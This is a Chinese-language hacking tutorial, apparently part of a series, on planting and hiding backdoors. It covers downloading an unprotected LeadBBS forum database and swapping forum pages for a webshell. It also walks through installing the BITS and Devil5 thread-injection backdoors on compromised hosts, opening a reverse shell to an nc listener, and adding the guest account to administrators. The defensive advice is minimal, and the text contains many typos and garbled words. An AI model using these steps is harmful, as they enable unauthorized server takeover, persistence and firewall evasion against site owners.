安全技术 后门程序知识认知与完全解析(2)

　运用举便

　　leadbbs2.77曾经风靡网络，它是个很典型的ASP论坛，屏蔽了很多可以SQL注入的寺方，但是很多傻瓜级别的网络管理员总是喜欢默认安装，然后启用论坛，我们只需要很简单地在IE中输入：WWW。***。COM/BBS/DATA/LEADBBS。MDB就能够直接下载该论坛的数据库了，而且没有MD5加密哦!，我们直接找到管理员的账户和密码，然后登录论坛，到管理界面将论坛的“联系我们”、“帮助”等ASP文件替换成我们的海阳项端代码，然后执行GUEST权限的CMD命令，方便的上传/下载将定程序、远程执行程序等，这样一个隐藏的后门就建好了!取得服务器的SYSTEM权限就看大家自己的办法了。

　　一般来讲，海洋的功能是非常强大的，而且不容易被查杀(一个朋友采取的方式是：先利用某个脚本漏洞上传网页后门，再通过海洋上传另一个后门到隐蔽的路径，然后通过最后上传的后门来删除第一次上传的海洋，这样后门的存放路径就可以放得非常深了，普通管理员是很难发现的)，如果管理员觉得自己可能中了这里边样的后门，可以利用论坛备份来恢复自己的页面系统，再配合系统日志、论坛日志等程序检查系统，发现可疑ASP文件打开看看海洋是很好识别的，再删除就可以了。

　　脚本方面的后门还有CGI和PHP两面三刀大类，使用原理都差不多，这里就不再多介绍，在黑防论坛也收录了这三种后门，大家可以下载后自己研究。

　　2.线程插入后门

　　首先我们来简单解释一下什么是典型的"线程插入"后门:这种后门在运行时没有进程,所有网络操作均播入到其他应用程序的进程中完成。也就是说，即使受控制端安装的防火墙拥有“应用程序访问权限”的功能，也不能对这样的后门进行有效的警告和拦截，也就使对方的防火墙形同虚设了!这种后门是现在非常主流的一种，很让防护的人头疼，因为对它的查杀比较困难，这种后门本身的功能比较强大，是“居中家旅行、入侵攻击”的必备品哦

　　这类的典范就是国内提倡网络共享的小榕的BITS了，从它的推出以来，各类安全工具下载园地里BITS就高居榜首，非常多的朋友使用它的过程中感到了方便。

　　BITS

　　类型：系统后门

　　使用范围：wind200/xp/2003

　　隐蔽程序：★★★★☆

　　使用难度：★★★☆☆

　　危害程序：★★★★☆

　　查杀难度：★★★★☆

　　BITS其实是Background Intelligent Transfer Servicer的缩写，可以在不知不觉中实现另一种意义的典型的线程插入后门，有以下特点：进程管理器中看不到;平时没有端口，只是在系统中充当卧底的角色;提供正向连接和反向连接两种功能;仅适合用于windows 200/xp/2003。

　　运用举例

　　首先我们用3389登录上肉鸡，确定你有SYSTEM的权限，将BITS.DLL拷贝到服务器上，执行CMD命令：

　　rundll32.exe bits.dll,install

　　这样就激活了BIST，程序用这个特征的字符来辨认使用者，也就相当于你的密码了，然后卸载：rundll32.exe BITS.dll,Uninstall

　　这是最简单的使用，这个后门除了隐蔽性好外，还有两大特点是非常 值得借鉴的：端口复用和正反向连接。虽然很多朋友经常听到这两个名词，但并不了解它们，端口复用就是利用系统正常的TCP端口通讯和控制，比如80、139等，这样的后门有个非常 大的好处就是非常 隐蔽，不用自己开端口也不会暴露自己的访问，因为通讯本身就是系统的正常访问!另一个是反向连接，这个很常 见，也是后门中一个经典思路，因为从服务器上主动方问外边是不被禁止的，很多很历害的防火墙就怕这点!

　　BITS的正向连接很简单，大家可以参考它的README，这种方式在服务器没有防火墙等措施的时候很管用，可以方便地连接，但是遇到有防火墙这样的方式就不灵了，得使用下面的反向连接方式：

　　在本地使用NC监听(如：nc -l -p 1234)

　　用NC连接目标主机的任何一个防火墙允许的TCP端口(80/139/445……)

　　输入激活命令：：[email=hkfx@dancewithdolphin[rxell]:1.1.1.1:2222]hkfx@dancewithdolphin[rxell]:1.1.1.1:2222[/email]

　　目标主机的CMD将会出现NC监听的端口2222，这样就实现了绕过防火墙的功能了。

　　devil5(魔鬼5号)

　　类型：系统后门

　　使用范围：win200/xp/2003

　　隐蔽程度：★★★★☆

　　使用难度：★★☆☆☆

　　危害程序：★★★★☆

　　查杀难度：★★★☆☆

　　同BITS一样，Devil5也是线程插入式的后门，和BITS不同的是它可以很方便的在GUI界面下按照自己的使用习惯定制端口和需要插入的线程，适合对系统有一定了解的使用都使用，由于是自定义插入线程，所以它更难被查杀，下面我们来看看它的使用。

　　运用举例：

　　道德使用它自带的配置程序EDITDEVIL5.EXE对后门进行常规的配置,包括控制端口、插入线程、连接密码、时间间隔等方面关键点是对插入线程的定制，一般设置成系统自带的SVCHOST，然后运行后门就可以控制了。

　　我们用TELNET连接上去，连接的格式是：TELNET *** 定制的端口，它和其他后门不同之处在于连接后没有提示的界面，每次执行程序也是分开的，必须要每次都有输入密码，比如我们丢掉了服务器和管账户，可以激活GUEST后再将GUEST加到管理员权限，记得每次执行命令后加上“>密码”就可以了：net localgroup administrators guest /add >hkfx，然后你又可以控制服务器了。

　　很明显示，同榕哥的BITS相比，DEVIL5有一些缺陷：不能通过系统自带端口通讯、执行命令比较麻烦，需要每次输入密码而且不回显示输入内容，很容易出错。但是，它有自己的优势：插入线程可以自已定制，比如设置IE的线程为插入的目标就比较难被查杀：自己提供了专门的查杀工具DELDEVIL5.exe，帮助防护者清理系统;而且它可以任意改名和绑定，使用灵活性上比BITS强……大家选择哪能款就看自己的喜好了。

　　另外，PortLess BackDoor等工具也是此类的后门，功能强大，隐蔽性稍差，大家有兴趣可以自己研究一下。